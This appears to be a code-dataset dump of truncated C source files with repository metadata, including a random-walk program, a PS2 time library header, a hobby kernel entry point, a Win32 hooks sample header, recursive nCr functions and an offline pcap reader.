void generate_random_walk(char array[10][10]);
void print_array(char array[10][10]);
int main(void)
{
char array[10][10];
int i, j;
for (i = 0; i < 10; i++) {
for (j = 0; j< 10; j++) {
array[i][j] = '.';
}
}
... | [
"seo0gyo@gmail.com"
] | seo0gyo@gmail.com |
60f1db727ac2f870369394f92e89433f16891169 | 42c51ae708eec6155bc7702503f4ab64aa91e4a8 | /libps2time.h | 6f431638ef84acf3cdf1f16ce99975c3e8edabcd | [] | no_license | belek666/libps2time | dd641915e4cf7e6bc0313bdf2fad7bec0de80007 | 1f4b8d27f4e2f2e8a3833bd3c856e425435eaa66 | refs/heads/master | 2021-01-20T01:22:26.691199 | 2019-11-28T16:16:18 | 2019-11-28T16:16:18 | 89,264,269 | 1 | 1 | null | null | null | null | UTF-8 | C | false | false | 2,961 | h | /*
=================================================================
ps2time - a time library for the ps2
Copyright (C) 2006 Torben "ntba2" Koenke
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Fo... | [
"belek666@onet.eu"
] | belek666@onet.eu |
2acb785bc764f24d6facf3ca41c0cf98d6417b6f | 87374b4b5adc988ec442681797f3cb072c9fb975 | /src/main.c | e0d25099386ba6ce09e869b231e09974b594c353 | [] | no_license | 8l/meraki | 09b65a399c6f8d59d13714d4d377a977672c1d91 | 7b5df078bc8754f31a7cfcd85f929ff047fd6dd8 | refs/heads/master | 2021-01-12T19:18:12.779473 | 2016-03-16T00:55:22 | 2016-03-16T00:55:22 | null | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 365 | c | #include "monitor.h"
#include "descriptor_tables.h"
#include "timer.h"
int main(struct multiboot *mboot_ptr)
{
// Initialize ISRs
init_descriptor_tables();
// Clear screen
kclear();
kprint("Kernel start\n");
asm volatile("int $0x3");
asm volatile("int $0x4");
asm volatile("s... | [
"bradfanella@gmail.com"
] | bradfanella@gmail.com |
c15149972c9a516bc6f7850f13f5ae73656cabf1 | efe1131a33ee82e7c46b5af4cf200dcae8eb4add | /samples/WIN32/Q_A/HOOKS/HOOKTEST.H | 50350a534f8c61191763abd58066946adfa2faf9 | [
"BSL-1.0"
] | permissive | ALEHACKsp/dmc | 819398bbb46e8b5a8ef5c344ef2a0f8b4ee8903c | 9478d25a677f70dbe4fc0ed317cc5a5e5050ef8b | refs/heads/master | 2022-12-28T13:36:57.721262 | 2020-10-11T07:47:16 | 2020-10-11T07:47:16 | null | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 1,339 | h |
/******************************************************************************\
* This is a part of the Microsoft Source Code Samples.
* Copyright (C) 1992-1995 Microsoft Corporation.
* All rights reserved.
* This source code is only intended as a supplement to
* Microsoft Devel... | [
"walter@walterbright.com"
] | walter@walterbright.com |
33e2180c4a0d6b43c0e78da6d368e67f770251be | 754e9851e853a9df36217e87fad8c43afc66fa9f | /Recursion/15.nCr using Recursion.c | aeca0688f9f4742c3456995b7b8fe3f08d26d781 | [] | no_license | AmpoluNisa03/Data-Structures-and-Algorithms | d5707e271a2c3a895290ef243f7b258951086022 | c1e00230a48ee9d9f2c8282ff0afd6819409741d | refs/heads/main | 2023-06-28T22:33:46.015486 | 2021-07-26T16:11:00 | 2021-07-26T16:11:00 | 301,527,000 | 1 | 0 | null | null | null | null | UTF-8 | C | false | false | 383 | c | #include<stdio.h>
int fact(int n)
{
if (n == 0)
return 1;
return fact(n - 1) * n;
}
int nCr(int n, int r)
{
int num, den;
num = fact(n);
den = fact(r) * fact(n - r);
return num / den;
}
int NCR(int n, int r)
{
if (n == r || r == 0)
return 1;
return NCR(n - 1, r - 1) + NCR(n - 1, r);
... | [
"noreply@github.com"
] | AmpoluNisa03.noreply@github.com |
5dd9cabe33d142e6a52b678ef28e8dc2ceb461dc | bcb1958ac9b198ff9a6fa5ea8db694c3ed2d0ad8 | /test.c | 4dbea19e3b93d9d3b9f7943c43088f467827b49c | [] | no_license | HasnatPranto/ETC. | 24a29889cdc2b302559744344116cce65435c0af | 15d15a6f6f359190f39da39adfb38d6490644a65 | refs/heads/master | 2021-06-27T17:09:16.802278 | 2020-10-19T17:08:05 | 2020-10-19T17:08:05 | 170,554,396 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 412 | c | #include<stdio.h>
#include<stdlib.h>
#include<pcap.h>
int main()
{
pcap_t *f;
struct pcap_pkthdr hdr;
int cnt=0;
char fileName[]={"test.pcap"};
const u_char *pack;
char ebuff[PCAP_ERRBUF_SIZE];
f=pcap_open_offline(fileName,ebuff);
if(f==NULL){
printf("Invalid file\n");
return 0;
}
else
{
while(pack... | [
"noreply@github.com"
] | HasnatPranto.noreply@github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.